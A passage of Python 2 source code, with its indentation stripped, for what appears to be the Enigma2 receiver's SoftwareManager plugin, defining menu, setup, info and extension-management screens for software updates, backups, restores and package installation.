print os_path.dirname(cache_file), 'is a file'
fd = open(cache_file, 'w')
dump(cache_data, fd, -1)
fd.close()
def valid_cache(cache_file, cache_ttl):
#See if the cache file exists and is still living
try:
mtime = stat(cache_file)[ST_MTIME]
except:
return 0
curr_time = time()
if (curr_time - mtime) > cache_ttl:
return 0
else:
return 1
def load_cache(cache_file):
#Does a cPickle load
fd = open(cache_file)
cache_data = load(fd)
fd.close()
return cache_data
class UpdatePluginMenu(Screen):
skin = """
<screen name="UpdatePluginMenu" position="center,center" size="610,410" title="Software management" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<ePixmap pixmap="skin_default/border_menu_350.png" position="5,50" zPosition="1" size="350,300" transparent="1" alphatest="on" />
<widget source="menu" render="Listbox" position="15,60" size="330,290" scrollbarMode="showOnDemand">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (2, 2), size = (330, 24), flags = RT_HALIGN_LEFT, text = 1), # index 0 is the MenuText,
],
"fonts": [gFont("Regular", 22)],
"itemHeight": 25
}
</convert>
</widget>
<widget source="menu" render="Listbox" position="360,50" size="240,300" scrollbarMode="showNever" selectionDisabled="1">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (2, 2), size = (240, 300), flags = RT_HALIGN_CENTER|RT_VALIGN_CENTER|RT_WRAP, text = 2), # index 2 is the Description,
],
"fonts": [gFont("Regular", 22)],
"itemHeight": 300
}
</convert>
</widget>
<widget source="status" render="Label" position="5,360" zPosition="10" size="600,50" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, args = 0):
Screen.__init__(self, session)
self.skin_path = plugin_path
self.menu = args
self.list = []
self.oktext = _("\nPress OK on your remote control to continue.")
self.menutext = _("Press MENU on your remote control for additional options.")
self.infotext = _("Press INFO on your remote control for additional information.")
self.text = ""
self.backupdirs = ' '.join( config.plugins.configurationbackup.backupdirs.value )
if self.menu == 0:
print "building menu entries"
self.list.append(("install-extensions", _("Manage extensions"), _("\nManage extensions or plugins for your receiver" ) + self.oktext, None))
self.list.append(("software-update", _("Software update"), _("\nOnline update of your receiver software." ) + self.oktext, None))
self.list.append(("software-restore", _("Software restore"), _("\nRestore your receiver with a new firmware." ) + self.oktext, None))
self.list.append(("system-backup", _("Backup system settings"), _("\nBackup your receiver settings." ) + self.oktext + "\n\n" + self.infotext, None))
self.list.append(("system-restore",_("Restore system settings"), _("\nRestore your receiver settings." ) + self.oktext, None))
self.list.append(("ipkg-install", _("Install local extension"), _("\nScan for local extensions and install them." ) + self.oktext, None))
for p in plugins.getPlugins(PluginDescriptor.WHERE_SOFTWAREMANAGER):
if p.__call__.has_key("SoftwareSupported"):
callFnc = p.__call__["SoftwareSupported"](None)
if callFnc is not None:
if p.__call__.has_key("menuEntryName"):
menuEntryName = p.__call__["menuEntryName"](None)
else:
menuEntryName = _('Extended Software')
if p.__call__.has_key("menuEntryDescription"):
menuEntryDescription = p.__call__["menuEntryDescription"](None)
else:
menuEntryDescription = _('Extended Software Plugin')
self.list.append(('default-plugin', menuEntryName, menuEntryDescription + self.oktext, callFnc))
if config.usage.setup_level.index >= 2: # expert+
self.list.append(("advanced", _("Advanced options"), _("\nAdvanced options and settings." ) + self.oktext, None))
elif self.menu == 1:
self.list.append(("advancedrestore", _("Advanced restore"), _("\nRestore your backups by date." ) + self.oktext, None))
self.list.append(("backuplocation", _("Select backup location"), _("\nSelect your backup device.\nCurrent device: " ) + config.plugins.configurationbackup.backuplocation.value + self.oktext, None))
self.list.append(("backupfiles", _("Select backup files"), _("Select files for backup.") + self.oktext + "\n\n" + self.infotext, None))
if config.usage.setup_level.index >= 2: # expert+
self.list.append(("ipkg-manager", _("Packet management"), _("\nView, install and remove available or installed packages." ) + self.oktext, None))
self.list.append(("ipkg-source",_("Select upgrade source"), _("\nEdit the upgrade source address." ) + self.oktext, None))
for p in plugins.getPlugins(PluginDescriptor.WHERE_SOFTWAREMANAGER):
if p.__call__.has_key("AdvancedSoftwareSupported"):
callFnc = p.__call__["AdvancedSoftwareSupported"](None)
if callFnc is not None:
if p.__call__.has_key("menuEntryName"):
menuEntryName = p.__call__["menuEntryName"](None)
else:
menuEntryName = _('Advanced software')
if p.__call__.has_key("menuEntryDescription"):
menuEntryDescription = p.__call__["menuEntryDescription"](None)
else:
menuEntryDescription = _('Advanced software plugin')
self.list.append(('advanced-plugin', menuEntryName, menuEntryDescription + self.oktext, callFnc))
self["menu"] = List(self.list)
self["key_red"] = StaticText(_("Close"))
self["status"] = StaticText(self.menutext)
self["shortcuts"] = NumberActionMap(["ShortcutActions", "WizardActions", "InfobarEPGActions", "MenuActions", "NumberActions"],
{
"ok": self.go,
"back": self.close,
"red": self.close,
"menu": self.handleMenu,
"showEventInfo": self.handleInfo,
"1": self.go,
"2": self.go,
"3": self.go,
"4": self.go,
"5": self.go,
"6": self.go,
"7": self.go,
"8": self.go,
"9": self.go,
}, -1)
self.onLayoutFinish.append(self.layoutFinished)
self.backuppath = getBackupPath()
self.backupfile = getBackupFilename()
self.fullbackupfilename = self.backuppath + "/" + self.backupfile
self.onShown.append(self.setWindowTitle)
self.onChangedEntry = []
self["menu"].onSelectionChanged.append(self.selectionChanged)
def createSummary(self):
from Screens.PluginBrowser import PluginBrowserSummary
return PluginBrowserSummary
def selectionChanged(self):
item = self["menu"].getCurrent()
if item:
name = item[1]
desc = item[2]
else:
name = "-"
desc = ""
for cb in self.onChangedEntry:
cb(name, desc)
def layoutFinished(self):
idx = 0
self["menu"].index = idx
def setWindowTitle(self):
self.setTitle(_("Software management"))
def cleanup(self):
iSoftwareTools.cleanupSoftwareTools()
def getUpdateInfos(self):
if iSoftwareTools.NetworkConnectionAvailable is True:
if iSoftwareTools.available_updates is not 0:
self.text = _("There are at least %s updates available.") % (str(iSoftwareTools.available_updates))
else:
self.text = "" #_("There are no updates available.")
if iSoftwareTools.list_updating is True:
self.text += "\n" + _("A search for available updates is currently in progress.")
else:
self.text = _("No network connection available.")
self["status"].setText(self.text)
def handleMenu(self):
self.session.open(SoftwareManagerSetup)
def handleInfo(self):
current = self["menu"].getCurrent()
if current:
currentEntry = current[0]
if currentEntry in ("system-backup","backupfiles"):
self.session.open(SoftwareManagerInfo, mode = "backupinfo")
def go(self, num = None):
if num is not None:
num -= 1
if not num < self["menu"].count():
return
self["menu"].setIndex(num)
current = self["menu"].getCurrent()
if current:
currentEntry = current[0]
if self.menu == 0:
if (currentEntry == "software-update"):
self.session.open(UpdatePlugin, self.skin_path)
elif (currentEntry == "software-restore"):
self.session.open(ImageWizard)
elif (currentEntry == "install-extensions"):
self.session.open(PluginManager, self.skin_path)
elif (currentEntry == "system-backup"):
self.session.openWithCallback(self.backupDone,BackupScreen, runBackup = True)
elif (currentEntry == "system-restore"):
if os_path.exists(self.fullbackupfilename):
self.session.openWithCallback(self.startRestore, MessageBox, _("Are you sure you want to restore the backup?\nYour receiver will restart after the backup has been restored!"))
else:
self.session.open(MessageBox, _("Sorry, no backups found!"), MessageBox.TYPE_INFO, timeout = 10)
elif (currentEntry == "ipkg-install"):
try:
from Plugins.Extensions.MediaScanner.plugin import main
main(self.session)
except:
self.session.open(MessageBox, _("Sorry, %s has not been installed!") % ("MediaScanner"), MessageBox.TYPE_INFO, timeout = 10)
elif (currentEntry == "default-plugin"):
self.extended = current[3]
self.extended(self.session, None)
elif (currentEntry == "advanced"):
self.session.open(UpdatePluginMenu, 1)
elif self.menu == 1:
if (currentEntry == "ipkg-manager"):
self.session.open(PacketManager, self.skin_path)
elif (currentEntry == "backuplocation"):
parts = [ (r.description, r.mountpoint, self.session) for r in harddiskmanager.getMountedPartitions(onlyhotplug = False)]
for x in parts:
if not access(x[1], F_OK|R_OK|W_OK) or x[1] == '/':
parts.remove(x)
if len(parts):
self.session.openWithCallback(self.backuplocation_choosen, ChoiceBox, title = _("Please select medium to use as backup location"), list = parts)
elif (currentEntry == "backupfiles"):
self.session.openWithCallback(self.backupfiles_choosen,BackupSelection)
elif (currentEntry == "advancedrestore"):
self.session.open(RestoreMenu, self.skin_path)
elif (currentEntry == "ipkg-source"):
self.session.open(IPKGMenu, self.skin_path)
elif (currentEntry == "advanced-plugin"):
self.extended = current[3]
self.extended(self.session, None)
def backupfiles_choosen(self, ret):
self.backupdirs = ' '.join( config.plugins.configurationbackup.backupdirs.value )
config.plugins.configurationbackup.backupdirs.save()
config.plugins.configurationbackup.save()
config.save()
def backuplocation_choosen(self, option):
oldpath = config.plugins.configurationbackup.backuplocation.getValue()
if option is not None:
config.plugins.configurationbackup.backuplocation.value = str(option[1])
config.plugins.configurationbackup.backuplocation.save()
config.plugins.configurationbackup.save()
config.save()
newpath = config.plugins.configurationbackup.backuplocation.getValue()
if newpath != oldpath:
self.createBackupfolders()
def createBackupfolders(self):
print "Creating backup folder if not already there..."
self.backuppath = getBackupPath()
try:
if (os_path.exists(self.backuppath) == False):
makedirs(self.backuppath)
except OSError:
self.session.open(MessageBox, _("Sorry, your backup destination is not writeable.\nPlease select a different one."), MessageBox.TYPE_INFO, timeout = 10)
def backupDone(self,retval = None):
if retval is True:
self.session.open(MessageBox, _("Backup completed."), MessageBox.TYPE_INFO, timeout = 10)
else:
self.session.open(MessageBox, _("Backup failed."), MessageBox.TYPE_INFO, timeout = 10)
def startRestore(self, ret = False):
if (ret == True):
self.exe = True
self.session.open(RestoreScreen, runRestore = True)
class SoftwareManagerSetup(Screen, ConfigListScreen):
skin = """
<screen name="SoftwareManagerSetup" position="center,center" size="560,440" title="SoftwareManager setup">
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
<widget name="config" position="5,50" size="550,350" scrollbarMode="showOnDemand" />
<ePixmap pixmap="skin_default/div-h.png" position="0,400" zPosition="1" size="560,2" />
<widget source="introduction" render="Label" position="5,410" size="550,30" zPosition="10" font="Regular;21" halign="center" valign="center" backgroundColor="#25062748" transparent="1" />
</screen>"""
def __init__(self, session, skin_path = None):
Screen.__init__(self, session)
self.session = session
self.skin_path = skin_path
if self.skin_path == None:
self.skin_path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager")
self.onChangedEntry = [ ]
self.setup_title = _("Software manager setup")
self.overwriteConfigfilesEntry = None
self.list = [ ]
ConfigListScreen.__init__(self, self.list, session = session, on_change = self.changedEntry)
self["actions"] = ActionMap(["SetupActions", "MenuActions"],
{
"cancel": self.keyCancel,
"save": self.apply,
"menu": self.closeRecursive,
}, -2)
self["key_red"] = StaticText(_("Cancel"))
self["key_green"] = StaticText(_("OK"))
self["key_yellow"] = StaticText()
self["key_blue"] = StaticText()
self["introduction"] = StaticText()
self.createSetup()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setTitle(self.setup_title)
def createSetup(self):
self.list = [ ]
self.overwriteConfigfilesEntry = getConfigListEntry(_("Overwrite configuration files?"), config.plugins.softwaremanager.overwriteConfigFiles)
self.list.append(self.overwriteConfigfilesEntry)
self.list.append(getConfigListEntry(_("show softwaremanager in setup menu"), config.plugins.softwaremanager.onSetupMenu))
self.list.append(getConfigListEntry(_("show softwaremanager on blue button"), config.plugins.softwaremanager.onBlueButton))
self["config"].list = self.list
self["config"].l.setSeperation(400)
self["config"].l.setList(self.list)
if not self.selectionChanged in self["config"].onSelectionChanged:
self["config"].onSelectionChanged.append(self.selectionChanged)
self.selectionChanged()
def selectionChanged(self):
if self["config"].getCurrent() == self.overwriteConfigfilesEntry:
self["introduction"].setText(_("Overwrite configuration files during software upgrade?"))
else:
self["introduction"].setText("")
def newConfig(self):
pass
def keyLeft(self):
ConfigListScreen.keyLeft(self)
def keyRight(self):
ConfigListScreen.keyRight(self)
def confirm(self, confirmed):
if not confirmed:
print "not confirmed"
return
else:
self.keySave()
plugins.clearPluginList()
plugins.readPluginList(resolveFilename(SCOPE_PLUGINS))
def apply(self):
self.session.openWithCallback(self.confirm, MessageBox, _("Use these settings?"), MessageBox.TYPE_YESNO, timeout = 20, default = True)
def cancelConfirm(self, result):
if not result:
return
for x in self["config"].list:
x[1].cancel()
self.close()
def keyCancel(self):
if self["config"].isChanged():
self.session.openWithCallback(self.cancelConfirm, MessageBox, _("Really close without saving settings?"), MessageBox.TYPE_YESNO, timeout = 20, default = True)
else:
self.close()
# for summary:
def changedEntry(self):
for x in self.onChangedEntry:
x()
self.selectionChanged()
def getCurrentEntry(self):
return self["config"].getCurrent()[0]
def getCurrentValue(self):
return str(self["config"].getCurrent()[1].value)
def createSummary(self):
from Screens.Setup import SetupSummary
return SetupSummary
class SoftwareManagerInfo(Screen):
skin = """
<screen name="SoftwareManagerInfo" position="center,center" size="560,440" title="SoftwareManager information">
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
<widget source="list" render="Listbox" position="5,50" size="550,340" scrollbarMode="showOnDemand" selectionDisabled="0">
<convert type="TemplatedMultiContent">
{"template": [
MultiContentEntryText(pos = (5, 0), size = (540, 26), font=0, flags = RT_HALIGN_LEFT | RT_HALIGN_CENTER, text = 0), # index 0 is the name
],
"fonts": [gFont("Regular", 24),gFont("Regular", 22)],
"itemHeight": 26
}
</convert>
</widget>
<ePixmap pixmap="skin_default/div-h.png" position="0,400" zPosition="1" size="560,2" />
<widget source="introduction" render="Label" position="5,410" size="550,30" zPosition="10" font="Regular;21" halign="center" valign="center" backgroundColor="#25062748" transparent="1" />
</screen>"""
def __init__(self, session, skin_path = None, mode = None):
Screen.__init__(self, session)
self.session = session
self.mode = mode
self.skin_path = skin_path
if self.skin_path == None:
self.skin_path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager")
self["actions"] = ActionMap(["ShortcutActions", "WizardActions"],
{
"back": self.close,
"red": self.close,
}, -2)
self.list = []
self["list"] = List(self.list)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText()
self["key_yellow"] = StaticText()
self["key_blue"] = StaticText()
self["introduction"] = StaticText()
self.onLayoutFinish.append(self.layoutFinished)
def layoutFinished(self):
self.setTitle(_("Softwaremanager information"))
if self.mode is not None:
self.showInfos()
def showInfos(self):
if self.mode == "backupinfo":
self.list = []
backupfiles = config.plugins.configurationbackup.backupdirs.value
for entry in backupfiles:
self.list.append((entry,))
self['list'].setList(self.list)
class PluginManager(Screen, PackageInfoHandler):
skin = """
<screen name="PluginManager" position="center,center" size="560,440" title="Extensions management" >
<ePixmap pixmap="skin_default/buttons/red.png" position="0,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/green.png" position="140,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/yellow.png" position="280,0" size="140,40" alphatest="on" />
<ePixmap pixmap="skin_default/buttons/blue.png" position="420,0" size="140,40" alphatest="on" />
<widget source="key_red" render="Label" position="0,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#9f1313" transparent="1" />
<widget source="key_green" render="Label" position="140,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#1f771f" transparent="1" />
<widget source="key_yellow" render="Label" position="280,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#a08500" transparent="1" />
<widget source="key_blue" render="Label" position="420,0" zPosition="1" size="140,40" font="Regular;20" halign="center" valign="center" backgroundColor="#18188b" transparent="1" />
<widget source="list" render="Listbox" position="5,50" size="550,360" scrollbarMode="showOnDemand">
<convert type="TemplatedMultiContent">
{"templates":
{"default": (51,[
MultiContentEntryText(pos = (0, 1), size = (470, 24), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (0, 25), size = (470, 24), font=1, flags = RT_HALIGN_LEFT, text = 2), # index 2 is the description
MultiContentEntryPixmapAlphaTest(pos = (475, 0), size = (48, 48), png = 5), # index 5 is the status pixmap
MultiContentEntryPixmapAlphaTest(pos = (0, 49), size = (550, 2), png = 6), # index 6 is the div pixmap
]),
"category": (40,[
MultiContentEntryText(pos = (30, 0), size = (500, 22), font=0, flags = RT_HALIGN_LEFT, text = 0), # index 0 is the name
MultiContentEntryText(pos = (30, 22), size = (500, 16), font=2, flags = RT_HALIGN_LEFT, text = 1), # index 1 is the description
MultiContentEntryPixmapAlphaTest(pos = (0, 38), size = (550, 2), png = 3), # index 3 is the div pixmap
])
},
"fonts": [gFont("Regular", 22),gFont("Regular", 20),gFont("Regular", 16)],
"itemHeight": 52
}
</convert>
</widget>
<widget source="status" render="Label" position="5,410" zPosition="10" size="540,30" halign="center" valign="center" font="Regular;22" transparent="1" shadowColor="black" shadowOffset="-1,-1" />
</screen>"""
def __init__(self, session, plugin_path = None, args = None):
Screen.__init__(self, session)
self.session = session
self.skin_path = plugin_path
if self.skin_path == None:
self.skin_path = resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager")
self["shortcuts"] = ActionMap(["ShortcutActions", "WizardActions", "InfobarEPGActions", "HelpActions" ],
{
"ok": self.handleCurrent,
"back": self.exit,
"red": self.exit,
"green": self.handleCurrent,
"yellow": self.handleSelected,
"showEventInfo": self.handleSelected,
"displayHelp": self.handleHelp,
}, -1)
self.list = []
self.statuslist = []
self.selectedFiles = []
self.categoryList = []
self.packetlist = []
self["list"] = List(self.list)
self["key_red"] = StaticText(_("Close"))
self["key_green"] = StaticText("")
self["key_yellow"] = StaticText("")
self["key_blue"] = StaticText("")
self["status"] = StaticText("")
self.cmdList = []
self.oktext = _("\nAfter pressing OK, please wait!")
if not self.selectionChanged in self["list"].onSelectionChanged:
self["list"].onSelectionChanged.append(self.selectionChanged)
self.currList = ""
self.currentSelectedTag = None
self.currentSelectedIndex = None
self.currentSelectedPackage = None
self.saved_currentSelectedPackage = None
self.restartRequired = False
self.onShown.append(self.setWindowTitle)
self.onLayoutFinish.append(self.getUpdateInfos)
def setWindowTitle(self):
self.setTitle(_("Extensions management"))
def exit(self):
if self.currList == "packages":
self.currList = "category"
self.currentSelectedTag = None
self["list"].style = "category"
self['list'].setList(self.categoryList)
self["list"].setIndex(self.currentSelectedIndex)
self["list"].updateList(self.categoryList)
self.selectionChanged()
else:
iSoftwareTools.cleanupSoftwareTools()
self.prepareInstall()
if len(self.cmdList):
self.session.openWithCallback(self.runExecute, PluginManagerInfo, self.skin_path, self.cmdList)
else:
self.close()
def handleHelp(self):
if self.currList != "status":
self.session.open(PluginManagerHelp, self.skin_path)
def setState(self,status = None):
if status:
self.currList = "status"
self.statuslist = []
self["key_green"].setText("")
self["key_blue"].setText("")
self["key_yellow"].setText("")
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
if status == 'update':
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
self.statuslist.append(( _("Updating software catalog"), '', _("Searching for available updates. Please wait..." ),'', '', statuspng, divpng, None, '' ))
elif status == 'sync':
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/upgrade.png"))
self.statuslist.append(( _("Package list update"), '', _("Searching for new installed or removed packages. Please wait..." ),'', '', statuspng, divpng, None, '' ))
elif status == 'error':
self["key_green"].setText(_("Continue"))
statuspng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
self.statuslist.append(( _("Error"), '', _("An error occurred while downloading the packetlist. Please try again." ),'', '', statuspng, divpng, None, '' ))
self["list"].style = "default"
self['list'].setList(self.statuslist)
def getUpdateInfos(self):
if (iSoftwareTools.lastDownloadDate is not None and iSoftwareTools.NetworkConnectionAvailable is False):
self.rebuildList()
else:
self.setState('update')
iSoftwareTools.startSoftwareTools(self.getUpdateInfosCB)
def getUpdateInfosCB(self, retval = None):
if retval is not None:
if retval is True:
if iSoftwareTools.available_updates is not 0:
self["status"].setText(_("There are at least ") + str(iSoftwareTools.available_updates) + _(" updates available."))
else:
self["status"].setText(_("There are no updates available."))
self.rebuildList()
elif retval is False:
if iSoftwareTools.lastDownloadDate is None:
self.setState('error')
if iSoftwareTools.NetworkConnectionAvailable:
self["status"].setText(_("Updatefeed not available."))
else:
self["status"].setText(_("No network connection available."))
else:
iSoftwareTools.lastDownloadDate = time()
iSoftwareTools.list_updating = True
self.setState('update')
iSoftwareTools.getUpdates(self.getUpdateInfosCB)
def rebuildList(self, retval = None):
if self.currentSelectedTag is None:
self.buildCategoryList()
else:
self.buildPacketList(self.currentSelectedTag)
def selectionChanged(self):
current = self["list"].getCurrent()
self["status"].setText("")
if current:
if self.currList == "packages":
self["key_red"].setText(_("Back"))
if current[4] == 'installed':
self["key_green"].setText(_("Uninstall"))
elif current[4] == 'installable':
self["key_green"].setText(_("Install"))
if iSoftwareTools.NetworkConnectionAvailable is False:
self["key_green"].setText("")
elif current[4] == 'remove':
self["key_green"].setText(_("Undo uninstall"))
elif current[4] == 'install':
self["key_green"].setText(_("Undo install"))
if iSoftwareTools.NetworkConnectionAvailable is False:
self["key_green"].setText("")
self["key_yellow"].setText(_("View details"))
self["key_blue"].setText("")
if len(self.selectedFiles) == 0 and iSoftwareTools.available_updates is not 0:
self["status"].setText(_("There are at least ") + str(iSoftwareTools.available_updates) + _(" updates available."))
elif len(self.selectedFiles) is not 0:
self["status"].setText(str(len(self.selectedFiles)) + _(" packages selected."))
else:
self["status"].setText(_("There are currently no outstanding actions."))
elif self.currList == "category":
self["key_red"].setText(_("Close"))
self["key_green"].setText("")
self["key_yellow"].setText("")
self["key_blue"].setText("")
if len(self.selectedFiles) == 0 and iSoftwareTools.available_updates is not 0:
self["status"].setText(_("There are at least ") + str(iSoftwareTools.available_updates) + _(" updates available."))
self["key_yellow"].setText(_("Update"))
elif len(self.selectedFiles) is not 0:
self["status"].setText(str(len(self.selectedFiles)) + _(" packages selected."))
self["key_yellow"].setText(_("Process"))
else:
self["status"].setText(_("There are currently no outstanding actions."))
def getSelectionState(self, detailsFile):
for entry in self.selectedFiles:
if entry[0] == detailsFile:
return True
return False
def handleCurrent(self):
current = self["list"].getCurrent()
if current:
if self.currList == "category":
self.currentSelectedIndex = self["list"].index
selectedTag = current[2]
self.buildPacketList(selectedTag)
elif self.currList == "packages":
if current[7] is not '':
idx = self["list"].getIndex()
detailsFile = self.list[idx][1]
if self.list[idx][7] == True:
for entry in self.selectedFiles:
if entry[0] == detailsFile:
self.selectedFiles.remove(entry)
else:
alreadyinList = False
for entry in self.selectedFiles:
if entry[0] == detailsFile:
alreadyinList = True
if not alreadyinList:
if (iSoftwareTools.NetworkConnectionAvailable is False and current[4] in ('installable','install')):
pass
else:
self.selectedFiles.append((detailsFile,current[4],current[3]))
self.currentSelectedPackage = ((detailsFile,current[4],current[3]))
if current[4] == 'installed':
self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'remove', True)
elif current[4] == 'installable':
if iSoftwareTools.NetworkConnectionAvailable:
self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'install', True)
elif current[4] == 'remove':
self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'installed', False)
elif current[4] == 'install':
if iSoftwareTools.NetworkConnectionAvailable:
self.list[idx] = self.buildEntryComponent(current[0], current[1], current[2], current[3], 'installable',False)
self["list"].setList(self.list)
self["list"].setIndex(idx)
self["list"].updateList(self.list)
self.selectionChanged()
elif self.currList == "status":
iSoftwareTools.lastDownloadDate = time()
iSoftwareTools.list_updating = True
self.setState('update')
iSoftwareTools.getUpdates(self.getUpdateInfosCB)
def handleSelected(self):
current = self["list"].getCurrent()
if current:
if self.currList == "packages":
if current[7] is not '':
detailsfile = iSoftwareTools.directory[0] + "/" + current[1]
if (os_path.exists(detailsfile) == True):
self.saved_currentSelectedPackage = self.currentSelectedPackage
self.session.openWithCallback(self.detailsClosed, PluginDetails, self.skin_path, current)
else:
self.session.open(MessageBox, _("Sorry, no details available!"), MessageBox.TYPE_INFO, timeout = 10)
elif self.currList == "category":
self.prepareInstall()
if len(self.cmdList):
self.session.openWithCallback(self.runExecute, PluginManagerInfo, self.skin_path, self.cmdList)
def detailsClosed(self, result = None):
if result is not None:
if result is not False:
self.setState('sync')
iSoftwareTools.lastDownloadDate = time()
for entry in self.selectedFiles:
if entry == self.saved_currentSelectedPackage:
self.selectedFiles.remove(entry)
iSoftwareTools.startIpkgListInstalled(self.rebuildList)
def buildEntryComponent(self, name, details, description, packagename, state, selected = False):
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
installedpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installed.png"))
installablepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/installable.png"))
removepng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/remove.png"))
installpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_PLUGIN, "SystemPlugins/SoftwareManager/install.png"))
if state == 'installed':
return((name, details, description, packagename, state, installedpng, divpng, selected))
elif state == 'installable':
return((name, details, description, packagename, state, installablepng, divpng, selected))
elif state == 'remove':
return((name, details, description, packagename, state, removepng, divpng, selected))
elif state == 'install':
return((name, details, description, packagename, state, installpng, divpng, selected))
def buildPacketList(self, categorytag = None):
if categorytag is not None:
self.currList = "packages"
self.currentSelectedTag = categorytag
self.packetlist = []
for package in iSoftwareTools.packagesIndexlist[:]:
prerequisites = package[0]["prerequisites"]
if prerequisites.has_key("tag"):
for foundtag in prerequisites["tag"]:
if categorytag == foundtag:
attributes = package[0]["attributes"]
if attributes.has_key("packagetype"):
if attributes["packagetype"] == "internal":
continue
self.packetlist.append([attributes["name"], attributes["details"], attributes["shortdescription"], attributes["packagename"]])
else:
self.packetlist.append([attributes["name"], attributes["details"], attributes["shortdescription"], attributes["packagename"]])
self.list = []
for x in self.packetlist:
status = ""
name = x[0].strip()
details = x[1].strip()
description = x[2].strip()
if not description:
description = "No description available."
packagename = x[3].strip()
selectState = self.getSelectionState(details)
if iSoftwareTools.installed_packetlist.has_key(packagename):
if selectState == True:
status = "remove"
else:
status = "installed"
self.list.append(self.buildEntryComponent(name, _(details), _(description), packagename, status, selected = selectState))
else:
if selectState == True:
status = "install"
else:
status = "installable"
self.list.append(self.buildEntryComponent(name, _(details), _(description), packagename, status, selected = selectState))
if len(self.list):
self.list.sort(key=lambda x: x[0])
self["list"].style = "default"
self['list'].setList(self.list)
self["list"].updateList(self.list)
self.selectionChanged()
def buildCategoryList(self):
self.currList = "category"
self.categories = []
self.categoryList = []
for package in iSoftwareTools.packagesIndexlist[:]:
prerequisites = package[0]["prerequisites"]
if prerequisites.has_key("tag"):
for foundtag in prerequisites["tag"]:
attributes = package[0]["attributes"]
if foundtag not in self.categories:
self.categories.append(foundtag)
self.categoryList.append(self.buildCategoryComponent(foundtag))
self.categoryList.sort(key=lambda x: x[0])
self["list"].style = "category"
self['list'].setList(self.categoryList)
self["list"].updateList(self.categoryList)
self.selectionChanged()
def buildCategoryComponent(self, tag = None):
divpng = LoadPixmap(cached=True, path=resolveFilename(SCOPE_CURRENT_SKIN, "skin_default/div-h.png"))
if tag is not None:
if tag == 'System':
return(( _("System"), _("View list of available system extensions" ), tag, divpng ))
elif tag == 'Skin':
return(( _("Skins"), _("View list of available skins" ), tag, divpng ))
elif tag == 'Recording':
return(( _("Recordings"), _("View list of available recording extensions" ), tag, divpng ))
elif tag == 'Network':
return(( _("Network"), _("View list of available networking extensions" ), tag, divpng ))
elif tag == 'CI':
